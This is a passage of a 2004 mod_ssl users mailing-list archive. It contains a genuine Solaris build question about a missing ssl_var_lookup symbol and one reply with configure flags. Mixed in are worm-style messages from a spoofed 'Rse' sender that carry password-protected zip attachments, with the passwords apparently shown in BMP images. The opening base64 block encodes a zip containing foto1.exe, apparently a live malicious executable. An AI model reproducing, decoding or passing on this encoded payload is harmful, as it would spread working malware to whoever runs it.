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
AA==

----------zogudmteamectowtyfxx--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep 14 11:48:04 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8DFB9A8A4D; Tue, 14 Sep 2004 11:48:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mailout02.sul.t-online.com (mailout02.sul.t-online.com [194.25.134.17])
	by master.modssl.org (Postfix) with ESMTP id A5030A893D
	for ; Tue, 14 Sep 2004 11:47:59 +0200 (CEST)
Received: from fwd03.aul.t-online.de 
	by mailout02.sul.t-online.com with smtp 
	id 1C79um-0005qP-04; Tue, 14 Sep 2004 11:47:56 +0200
Received: from lagune (ZZ7gx8Zawe2AVnofUrMcrVSc-mh5qElytaiT5oMQZD4GKzL9hl7osP@[80.128.220.145]) by fmrl03.sul.t-online.com
	with esmtp id 1C79ue-1Yx77A0; Tue, 14 Sep 2004 11:47:48 +0200
From: =?iso-8859-1?Q?Helke_Schr=F6der?= 
To: 
Subject: mod_ssl on sparc solaris
Date: Tue, 14 Sep 2004 11:49:58 +0200
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Importance: Normal
X-ID: ZZ7gx8Zawe2AVnofUrMcrVSc-mh5qElytaiT5oMQZD4GKzL9hl7osP@t-dialin.net
X-TOI-MSGID: 74bc8511-d551-49bd-b776-8d18c6965372
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?Q?Helke_Schr=F6der?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

we have some problems to get mod_ssl working on solaris
First we tried at suse 8.2 and there was no problem at all, but now we have
troubles and hope someone can give us a hint..

While doing config and make there seems to be no problem
Even apache can be started and "apachectl configtest" says "Syntax OK"

but when viewing the environment variables some of them are missing like
SSL_CLIENT_S_DN
only the server-variables are there

and when trying to start mod_authz_ldap (which uses the variables provided
by mod_ssl) it appears this message when typing "apachectl configtest"

Syntax error on line 246 of /opt/webservers/apache/conf/httpd.conf:
Cannot load /opt/webservers/apache/libexec/mod_authz_ldap.so into server:
ld.so.1: /opt/webservers/apache/bin/httpd: fatal: relocation error: file
/opt/webservers/apache/libexec/mod_authz_ldap.so: symbol ssl_var_lookup:
referenced symbol not found

We have experimented with ./config shared -fPIC for openssl and
--enable-rule=SHARED_CORE (for mod_ssl and apache)

but without success

(we are using apache 1.3.31, openssl 0.9.7d, mod_ssl 2.8.19-1.3.31 on sparc
solaris 8)

thanks in advance
Helke Schröder

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 15 08:49:25 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 069D1A8A99; Wed, 15 Sep 2004 08:49:24 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from c-blougouras.net (ATuileries-117-1-9-135.w80-11.abo.wanadoo.fr [80.11.116.135])
	by master.modssl.org (Postfix) with SMTP id E9D6BA8A69
	for ; Wed, 15 Sep 2004 08:49:19 +0200 (CEST)
Date: Wed, 15 Sep 2004 08:48:34 +0100
To: "Modssl-users" 
From: "Rse" 
Subject: Re:
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------gugwobcjwyocfzzvdjvn"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------gugwobcjwyocfzzvdjvn
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


>Screen and Music





Password: 





----------gugwobcjwyocfzzvdjvn
Content-Type: image/bmp; name="dzmkodbmnj.bmp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="dzmkodbmnj.bmp"
Content-ID: 

Qk22BwAAAAAAADYAAAAoAAAAQAAAAA8AAAABABAAAAAAAIAHAAAAAAAAAAAAAAAAAAAAAAAA
/3//f/9//3//f/9//3//f/9//3//f/9//3//f18IXwhfCF8IXwhfCF8IXwhfCF8IXwhfCF8I
XwhfCF8IXwhfCF8IXwhfCF8IXwhfCF8IXwhfCF8IXwhfCF8IXwhfCF8IXwj/f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9/X0pfCN85f2//f/9/X2t/LV8In1L/f/9//3+/dx9CXwh/LR9j
/3//f/9/X0pfCN85f2//f/9/33tfSl8Iv1b/f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/X0pfCJ9zH2NfCH9v/3/fOV8I
33vfOV9K/3//f19KXwi/d99aXwgfY/9/X0pfCJ9zH2NfCH9v/3+fUl8Iv3ffOZ9S/3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/38fQl8I/3//f18I3zn/f/9//3//f79WXwh/b/9//3//f/9/f29fCH8t/38fQl8I/3//f18I
3zn/f18IXwj/f99aXwi/d/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/XwhfCP9/v3cfQn8tv1ZfCL9W/3//f/9/
/3//f18Ify3/f/9//3//f/9/XwhfCP9/XwhfCP9/X2tfCN9a/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3+/d793v3dfCN85
/3+fUl8In3MfY18I3zn/f/9//3//fx9jXwhfa/9//3+/d793v3dfCN85/39fCF8I/3+fc18I
X0r/f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f985Xwh/LX8tf2//f18IXwj/f793XwhfCP9//3//fx9CXwgfQr93/3//f985
Xwh/LX8tf2//f19KXwifc997XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/n1JfCD9n/3//f/9/XwhfCP9//39fCF8I
/3//f/9//38/Z18IX0r/f/9/n1JfCD9n/3//f/9/H2NfCF9r/39fCF8I/3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38fY18I
v1b/f/9//38fQl8I33v/f18I3zn/f/9//3//f/9/XwhfCP9//38fY18Iv1b/f/9//3/fe18I
31r/f18IXwj/f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f39vXwgfY59zXwi/Vv9//3+/Vl8Iv3dfCB9C
/3//f59zXwhfSv9//3//f/9/v1bfOb93XwifUv9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//39fCF8IXwhfCP9//39fa985
XwhfSv9//3//f793H0JfCN85v3f/f/9//39fCF8IXwhfCP9//3//f79WXwhfSt97/3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------gugwobcjwyocfzzvdjvn
Content-Type: application/octet-stream; name="Doll.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Doll.zip"



----------gugwobcjwyocfzzvdjvn--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 15 11:53:33 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5A4B5A8943; Wed, 15 Sep 2004 11:53:33 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web60703.mail.yahoo.com (web60703.mail.yahoo.com [216.109.117.226])
	by master.modssl.org (Postfix) with SMTP id 68D43A893B
	for ; Wed, 15 Sep 2004 11:53:27 +0200 (CEST)
Message-ID: <20040915095320.43737.qmail@web60703.mail.yahoo.com>
Received: from [62.129.121.33] by web60703.mail.yahoo.com via HTTP; Wed, 15 Sep 2004 02:53:20 PDT
Date: Wed, 15 Sep 2004 02:53:20 -0700 (PDT)
From: Matt Stevenson 
Subject: Re: mod_ssl on sparc solaris
To: modssl-users@modssl.org
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Stevenson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I haven't used authz_ldap in a while but I believe the
following config should work. Also you should see
mod_so.c listed for a "httpd -l". 

./httpd -l
Compiled-in modules:
  http_core.c
  mod_so.c

openssl:
       CC=$(CC) ./config shared no-idea

modssl:
        ./configure \
--with-apache=$(COMP_DIR)/$(APACHE_DIR) \             
         --with-ssl=$(COMP_DIR)/$(OPENSSL_DIR) \
--with-mm=$(COMP_DIR)/$(MM_DIR) )
                                                      
                                                      
                                         
apache:
        ./configure --prefix=$(APACHE_PREFIX) \       
                      --enable-module=rewrite
--enable-module=ssl \
--enable-module=most \                 
--enable-shared=max  \
--enable-rule=SSL_EXPERIMENTAL \

Regards
Matt

--- Helke_Schröder  wrote:

> Hi,
> 
> we have some problems to get mod_ssl working on
> solaris
> First we tried at suse 8.2 and there was no problem
> at all, but now we have
> troubles and hope someone can give us a hint..
> 
> While doing config and make there seems to be no
> problem
> Even apache can be started and "apachectl
> configtest" says "Syntax OK"
> 
> but when viewing the environment variables some of
> them are missing like
> SSL_CLIENT_S_DN
> only the server-variables are there
> 
> and when trying to start mod_authz_ldap (which uses
> the variables provided
> by mod_ssl) it appears this message when typing
> "apachectl configtest"
> 
> Syntax error on line 246 of
> /opt/webservers/apache/conf/httpd.conf:
> Cannot load
> /opt/webservers/apache/libexec/mod_authz_ldap.so
> into server:
> ld.so.1: /opt/webservers/apache/bin/httpd: fatal:
> relocation error: file
> /opt/webservers/apache/libexec/mod_authz_ldap.so:
> symbol ssl_var_lookup:
> referenced symbol not found
> 
> We have experimented with ./config shared -fPIC for
> openssl and
> --enable-rule=SHARED_CORE (for mod_ssl and apache)
> 
> but without success
> 
> (we are using apache 1.3.31, openssl 0.9.7d, mod_ssl
> 2.8.19-1.3.31 on sparc
> solaris 8)
> 
> thanks in advance
> Helke Schröder
> 
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
> majordomo@modssl.org
> 


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 16 09:16:44 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8EB24A8D06; Thu, 16 Sep 2004 09:16:44 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from c-blougouras.net (ATuileries-117-1-23-146.w193-251.abo.wanadoo.fr [193.251.49.146])
	by master.modssl.org (Postfix) with SMTP id 30F39A8CEA
	for ; Thu, 16 Sep 2004 09:16:38 +0200 (CEST)
Date: Thu, 16 Sep 2004 09:15:50 +0100
To: "Modssl-users" 
From: "Rse" 
Subject: Re:
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------dvfgqhqfxyjyswxeptrc"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------dvfgqhqfxyjyswxeptrc
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


>Animals




Password: 





----------dvfgqhqfxyjyswxeptrc
Content-Type: image/bmp; name="swkyqxftws.bmp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="swkyqxftws.bmp"
Content-ID: 

Qk2mBwAAAAAAADYAAAAoAAAANwAAABEAAAABABAAAAAAAHAHAAAAAAAAAAAAAAAAAAAAAAAA
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/38AAP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9/AAD/f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//fwAA/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//38AAP9//3//f/9//3//f/9//3//f/9//39aayklAABzTv9//3//f/9/
/38pJQAA3nv/f/9/vXetNQAAlFL/f/9//3//fwAAAAD/f/9//3//fyklAAAAAAAAAAAAAP9/
/3//f/9//3//f/9//3//f/9/AAD/f/9//3//f/9//3//f/9//3//f/9/rTUAAN57rTUxRv9/
/3//f/9/MUYAAJxz/3//f+89AABaawAAlFL/f/9//38xRgAAnHP/f/9//3+UUgAAWmv/f/9/
/3//f/9//3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9//3//f/9//3//f/9//3//f5RS
AAB7b/9//3//f9ZaAAD3Xv9//38AAAAA/38AACkl/3//f/9/lFIAAFpr/3//f/9//3/vPQAA
nHP/f/9//3//f/9//3//f/9//3//f/9//38AAP9//3//f/9//3//f/9//3//f/9//3+9d+89
KSWUUgAAlFL/f/9//39aawAAlFL/f/9/rTUAAP9/AAAAAP9//3//f3tvAABzTv9//3//f/9/
/3+UUiklvXf/f/9//3//f/9//3//f/9//3//f/9/AAD/f/9//3//f/9//3//f/9//3//f/9/
c04AAJxz914AAK01/3//f/9/nHMAAO89/3//f1prAABaawAA7z3/f/9//3//f601AAD/f/9/
/3//f/9//3/vPSkl3nv/f/9//3//f/9//3//f/9//3//fwAA/3//f/9//3//f/9//3//f/9/
/3//fwAAAAD/f713AAAAAP9//3//f/9/AAAAAP9//3//f3tvAAAAANZa/3//f/9//3/WWgAA
e2//f/9//3//f/9/nHMAAJRS/3//f/9//3//f/9//3//f/9//38AAP9//3//f/9//3//f/9/
/3//f/9//38AAAAA/3//fwAAAAD/f/9/nHP/f601AAC9d/9//38xRgAAnHMAANZa/3//f/9/
3nsAAHNO/3//f/9//3//f1prAAApJf9//3//f/9//3//f/9//3//f/9/AAD/f/9//3//f/9/
/3//f/9//3//f/9/7z0AAN57/38AAK01/3//fwAAAAApJQAAe2//f/9/AAAAAP9/AAAAAP9/
/3//f/9/lFIAAN57/3//fzFGKSX/fwAAAAD/f/9//3//f/9//3//f/9//3//fwAA/3//f/9/
/3//f/9//3//f/9//3//f3tvAAD3XpxzAACUUv9//3+9d9ZaKSUAAPde/3//fzFGAACccwAA
rTX/f/9//3//f/9/rTVzTv9//3+UUgAAnHMAAHNO/3//f/9//3//f/9//3//f/9//38AAP9/
/3//f/9//3//f/9//3//f/9//3//f1prrTUAADFG/3//f/9//3//f/9/c04xRv9//3//fzFG
AACtNb13/38AAAAAAAAAAAAAAAD/f/9//38xRgAArTW9d/9//3//f/9//3//f/9//3//f/9/
